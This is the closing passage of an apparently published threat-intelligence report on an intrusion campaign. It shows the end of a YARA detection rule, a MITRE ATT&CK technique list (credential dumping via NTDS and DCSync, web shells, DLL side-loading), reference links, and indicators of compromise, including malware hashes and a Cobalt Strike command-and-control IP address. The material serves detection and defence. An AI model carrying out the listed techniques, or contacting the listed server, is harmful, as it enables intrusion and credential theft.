        $b3 = "createEmailDraft" ascii fullword
        $b4 = "delMail" ascii fullword
    condition:
        all of ($a*) and 2 of ($b*)
}
```
Observed adversary tactics and techniques
Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
Tactics
Tactics represent the why of a technique or sub-technique. They are the adversary's tactical goal: the reason for performing an action.
Techniques/sub-techniques
Techniques and sub-techniques represent how an adversary achieves a tactical goal by performing an action.
- Gather victim host information
- Gather victim identity information
- Gather victim network information
- Gather victim org information
- Exploit public-facing application
- Command and Scripting Interpreter: Windows command-shell
- Command and Scripting Interpreter: Powershell
- Network share discovery
- Remote system discovery
- File and directory discovery
- Process discovery
- Remote services: SMB/Windows admin shares
- System service discovery
- System owner/user discovery
- Hijack execution flow: DLL side-loading
- Masquerading: Masquerade task or service
- Process injection
- Indicator removal: File deletion
- Deobfuscate/decode files or information
- Virtualization/sandbox evasion: Time based Evasion
- OS credential dumping: NTDS
- OS credential dumping: Security Account Manager
- OS credential dumping: DCSync
- Create or modify system process: Windows service
- Scheduled task/job: Scheduled task
- Valid accounts
- Server software component: IIS components
- Server software component: Web shell
- Email collection: Local email collection
- Archive collected data: Archive via utility
- Screen capture
- Web service
- Application layer protocol: Web protocols
References
- https://malpedia.caad.fkie.fraunhofer.de/details/win.doorme
- https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks
- https://threatfox.abuse.ch/ioc/1023850/
- https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper
- https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell
- https://github.com/tennc/webshell/blob/master/Godzilla/123.ashx
Observables
All observables are also available for download in both ECS and STIX format in a combined zip bundle.
The following observables were discussed in this research.
| Indicator | Type | Name | Reference |
|---|---|---|---|
| 1a87e1b41341ad042711faa0c601e7b238a47fa647c325f66b1c8c7b313c8bdf | SHA-256 | OfficeClient.exe and OfficeCore.exe | SIESTAGRAPH |
| 7fc54a287c08cde70fe860f7c65ff71ade24dfeedafdfea62a8a6ee57cc91950 | SHA-256 | Officeclient.exe | SIESTAGRAPH |
| f9b2b3f7ee55014cc8ad696263b24a21ebd3a043ed1255ac4ab6a63ad4851094 | SHA-256 | officeup.exe | SIESTAGRAPH |
| c283ceb230c6796d8c4d180d51f30e764ec82cfca0dfaa80ee17bb4fdf89c3e0 | SHA-256 | Microsoft.Exchange.Entities.Content.dll | DOORME |
| 4b7d244883c762c52a0632b186562ece7324881a8e593418262243a5d86a274d | SHA-256 | iisrehv.dll | SessionManager |
| 54f969ce5c4be11df293db600df57debcb0bf27ecad38ba60d0e44d4439c39b6 | SHA-256 | kk2.exe | mhyprot.sys loader |
| 509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6 | SHA-256 | mhyprot.sys | vulnerable driver |
| 386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd | SHA-256 | 13802 AR.exe (compiled name BDReinit.exe) | vulnerable Bitdefender Crash Handler |
| 452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05 | SHA-256 | log.dll | SHADOWPAD |
| 5be0045a2c86c38714ada4084080210ced8bc5b6865aef1cca658b263ff696dc | SHA-256 | APerfectDayBase.dll | malicious DLL injected into vulnerable binaries |
| 3f5377590689bd19c8dd0a9d46f30856c90d4ee1c03a68385973188b44cc9ab7 | SHA-256 | AlarmClock.exe | benign, but targeted for side-loading APerfectDayBase.dll |
| f2a9ee6dd4d1ceb4d97138755c919549549311c06859f236fc8655cf38fe5653 | SHA-256 | Loader.any | currently unknown DLL |
| 3b41c46824b78263d11b1c8d39cfe8c0e140f27c20612d954b133ffb110d206a | SHA-256 | Loader.any | currently unknown DLL |
| 9b66cd1a80727882cfa1303ada37019086c882c9543b3f957ee3906440dc8276 | SHA-256 | Class1.exe | currently unknown file |
| 185.239.70.229 | ipv4 | na | Cobalt Strike C2 |
